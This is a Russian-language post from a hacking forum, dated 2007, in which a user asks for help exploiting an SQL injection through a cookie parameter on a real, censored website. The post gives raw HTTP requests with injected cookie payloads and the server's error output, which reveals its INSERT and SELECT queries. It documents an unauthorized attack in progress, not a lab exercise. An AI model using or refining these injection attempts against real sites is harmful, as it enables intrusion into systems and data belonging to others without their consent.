Вопрос по sql-inj в кукисах

Вопрос по sql-inj в кукисах

25.12.2007, 00:37

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

С нами: 9976706

Репутация: 1934

Вопрос по sql-inj в кукисах

Нашёл скул на сайте в куках. подставляем ковычку - выдает ошибку. Пробую раскрутить, а сервер каким-то макаром по-разному отвечает на изменения в запросе...Например, получается так:

Первый запрос

Код:

GET http://<ЦЕНЗУРА>/ HTTP/1.0
Accept: */*
Accept-Language: ru
Host: <ЦЕНЗУРА>
Pragma: no-cache
Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12'/*

error near чета-там...
INSERT INTO online (uid, par2, lastdate, location, useragent, ip, proxy ) VALUES(0, 'n0u21994ig02q51f6ka36vgk12' and 1=0/*', 1198519416, '%mainpage%', '', '85.214.66.61', '85.214.66.61')

Соответственно, я пытаюсь собственноручно заполнить INSERT и получается вот что:

Код:

GET http://<ЦЕНЗУРА>/ HTTP/1.0
Accept: */*
Accept-Language: ru
Host: <ЦЕНЗУРА>
Pragma: no-cache
Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '' , '1.1.1.1', '1.1.1.1')/*

error near чета-там...
SELECT COUNT(*) as count FROM online WHERE par2='n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '' , '1.1.1.1', '1.1.1.1')/*[/

Так и получается, что я пытаюсь сделать правильный на мой взгляд запрос, а сервес сцуко, каким-то макаром меняет ответ когда не надо >:0

В чем проблема?

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось AFoST; 25.12.2007 в 00:42..

Создать сделку

Мои сделки

Сделка

ESCROW ADMIN PANEL